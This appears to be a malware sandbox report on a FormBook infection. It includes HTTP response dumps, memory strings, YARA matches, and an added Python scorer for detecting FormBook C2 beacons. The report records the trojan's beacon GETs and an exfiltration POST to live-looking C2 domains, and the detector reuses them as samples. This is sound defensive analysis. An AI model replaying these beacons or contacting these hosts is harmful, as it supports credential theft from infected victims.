68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 
70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:25:56 GMTServer: ApacheContent-Length: 1080Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 
68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:26:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4Bm5oT6L32EHhQScn%2FtDbeMq%2BGSCtJ4rHUlR%2F9gG1wt8%2FwTsgoIiTesoXJRrMBYYUrbydAF9DG4SBVpxme%2F4Q6xkkqvRLysGUpAO2uDyfGHGC9THh5E8MONAvbn6lHBEf9ryiEAkI5ZF4vZzenvFw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 771d0bc54f76cb33-DUSContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d c8 30 b4 b3 d1 87 4a 83 ec 2a b2 83 29 ce 4b cf cc ab 40 96 d3 07 99 0e 66 40 5d 06 00 00 00 ff ff 03 00 90 3b 34 31 a2 00 00 00 0d 0a Data Ascii: 84(HML),I310Q/Qp/Kr$T*$'*gd*SJRl2M0J*)K@f@];41
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:26:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jaa7kcfd7bhqdLX%2BdsVwejqS0LNj%2B78qOvyX9vxAKUqLl0zphihGHPKzcKLvxmdQpMSPuS62wkF%2B2VPDre1rQCML7ysqKeZLpQKERY5%2Fpc0doM%2BigaFk2AS6tyy2cLB5INHeF6%2FnLbEv1IZyRvjzOg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 771d0bd20dfdcb0d-DUSContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d c8 30 b4 b3 d1 87 4a 83 ec 2a b2 83 29 ce 4b cf cc ab 40 96 d3 07 99 0e 66 40 5d 06 00 00 00 ff ff 03 00 90 3b 34 31 a2 00 00 00 0d 0a Data Ascii: 84(HML),I310Q/Qp/Kr$T*$'*gd*SJRl2M0J*)K@f@];41
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:26:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Clw8fY7BTlk%2BiuvgOg38eNqUX%2BGkg%2FfQmp23yaEcJNSKPLcsQppB4ilga4hDWbNYtsCNEfZxXpq%2BFcatW2a3IHfDbDeR20jL6T6YaLWHd83aJ2ntsmrCUXAOGPyWH8DcwEGCG9SmWqqhZrRcNN9ynw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 771d0bdedcba9b83-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.304813988.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.240724345.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.283521778.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253709611.0000000008442000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 1--Lt08NN.10.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1--Lt08NN.10.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1--Lt08NN.10.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1--Lt08NN.10.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1--Lt08NN.10.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: NETSTAT.EXE, 0000000A.00000002.501856289.00000000042BE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Kanit:200
Source: 1--Lt08NN.10.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1--Lt08NN.10.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 1--Lt08NN.10.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 1--Lt08NN.10.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 1--Lt08NN.10.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 67 55 49 7a 31 2d 55 52 64 63 28 79 52 35 48 51 7e 59 4c 4c 35 72 75 31 30 79 78 5a 6b 52 36 5f 76 35 64 77 58 51 59 4e 35 56 4c 5a 6b 66 43 4b 44 4c 75 4c 28 46 76 59 79 38 4b 33 78 72 33 55 32 38 37 33 28 36 58 61 54 56 44 39 4a 69 53 7a 62 51 55 45 64 6d 57 53 53 45 59 6a 4b 4c 68 4a 28 6e 61 47 54 67 61 49 66 65 35 64 4a 72 4b 55 73 41 68 57 56 47 76 44 4b 61 43 54 77 78 78 39 38 34 77 68 4c 53 30 69 51 37 67 37 48 31 63 69 4e 79 45 48 30 58 30 39 51 39 61 64 39 36 4e 69 68 59 77 5f 6b 74 7a 49 28 57 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo.
Source: unknown DNS traffic detected: queries for: www.ope-cctv.com
Source: global traffic HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1Host: www.ope-cctv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1Host: www.dersameh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1Host: www.marketmall.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1Host: www.canadianlocalbusiness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
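The GET and POST requests recorded above share a structure that is more stable than any single domain: a short campaign path with a trailing slash (/4u5a/), a GET with exactly two query parameters (one short token, one long encoded blob) carrying only Host and Connection headers, NUL padding after the body, and a POST whose Origin and Referer are rebuilt from Host and path and which carries a single form field in a base64 variant using "(", "~", "_" and "-". The Python below is an added triage example written for this report, not part of the Joe Sandbox output. It scores a raw request on those structural indicators instead of matching the literal path or field names, which rotate between builds. The weights and the threshold are this example's own choices, and the three sample requests are constructed here (the first two mirror requests listed above; the third is a benign control). Note that a 404 from a contacted host, as seen for every response above, does not mean nothing was exfiltrated: FormBook beacons to a list of decoy domains alongside its live C2, so each host in the list deserves the same treatment.

```python
"""Heuristic scorer for FormBook-style HTTP C2 beacons (added example, not sandbox output).

Indicators come from the requests recorded in this report. Weights/threshold are assumptions.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# User-Agent used by the POST beacons recorded above (an IE11 compatibility string).
FORMBOOK_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
# Campaign path: one short alphanumeric directory with a trailing slash, nothing else.
PATH_RE = re.compile(r"^/[A-Za-z0-9]{3,8}/$")
# Encoded blob: standard base64 (seen in the GETs) or the ( ~ _ - . variant (seen in the POSTs).
BLOB_RE = re.compile(r"^(?:[A-Za-z0-9+/=]{40,}|[A-Za-z0-9()~_.=-]{40,})$")


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)

    def hit(self, points: int, why: str) -> None:
        self.score += points
        self.reasons.append(why)


def split_form(encoded: str):
    """Split k=v&k=v pairs WITHOUT decoding, so '+' and '%xx' inside the blob survive intact."""
    pairs = []
    for part in encoded.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def parse_request(raw: bytes):
    """Return (method, target, lower-cased headers, body without NUL padding, NUL trailer)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    payload = body.rstrip(b"\x00")  # the beacon pads the body with NUL bytes
    return method, target, headers, payload, body[len(payload):]


def score_request(raw: bytes) -> Verdict:
    v = Verdict()
    method, target, headers, payload, trailer = parse_request(raw)
    url = urlsplit(target)
    host = headers.get("host", "")

    if PATH_RE.match(url.path):
        v.hit(2, f"short campaign-style path {url.path}")
    if headers.get("connection", "").lower() == "close":
        v.hit(1, "Connection: close")
    if trailer:  # trailer is all NUL by construction
        v.hit(3, f"{len(trailer)} NUL bytes after the body")

    if method == "GET":
        values = sorted((val for _, val in split_form(url.query)), key=len)
        # Exactly two parameters: one short token plus one long encoded blob.
        if len(values) == 2 and len(values[0]) <= 8 and BLOB_RE.match(values[1]):
            v.hit(3, "two-parameter GET: short token plus encoded blob")
        # A browser sends Accept and User-Agent; the beacon sends only Host and Connection.
        if set(headers) <= {"host", "connection"}:
            v.hit(2, "only Host/Connection headers on a GET")
    elif method == "POST":
        fields = split_form(payload.decode("latin-1"))
        if len(fields) == 1 and BLOB_RE.match(fields[0][1]):
            v.hit(3, "single form field carrying an encoded blob")
        origin = headers.get("origin", "")
        if host and origin == f"http://{host}" and headers.get("referer") == origin + url.path:
            v.hit(2, "Origin and Referer rebuilt from Host and path")
        if headers.get("user-agent") == FORMBOOK_UA:
            v.hit(1, "IE11 compatibility User-Agent")
    return v


def is_formbook_like(raw: bytes, threshold: int = 7) -> bool:
    return score_request(raw).score >= threshold


# Constructed samples: the first two mirror beacons recorded above, the third is a benign control.
BEACON_GET = (
    b"GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1\r\n"
    b"Host: www.ope-cctv.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7
)
BEACON_POST = (
    b"POST /4u5a/ HTTP/1.1\r\nHost: www.dersameh.com\r\nConnection: close\r\n"
    b"Content-Length: 190\r\nCache-Control: no-cache\r\nOrigin: http://www.dersameh.com\r\n"
    b"User-Agent: " + FORMBOOK_UA.encode() + b"\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
    b"Referer: http://www.dersameh.com/4u5a/\r\nAccept-Language: en-US\r\n"
    b"Accept-Encoding: gzip, deflate\r\n\r\n"
    b"l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873"
    b"(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo."
    + b"\x00" * 8
)
BROWSER_GET = (
    b"GET /index.html?lang=en&page=2 HTTP/1.1\r\nHost: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"
)

if __name__ == "__main__":
    for name, sample in (("GET", BEACON_GET), ("POST", BEACON_POST), ("browser", BROWSER_GET)):
        verdict = score_request(sample)
        print(name, verdict.score, is_formbook_like(sample), verdict.reasons)
```

Run against a proxy or IDS request log, the NUL trailer and the missing User-Agent on the GETs are the strongest single signals; the path and Connection: close indicators alone are deliberately kept below the threshold so ordinary short-path requests with Connection: close are not flagged.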

E-Banking Fraud

Source: Yara match File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: RegSvcs.exe PID: 5148, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 4844, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
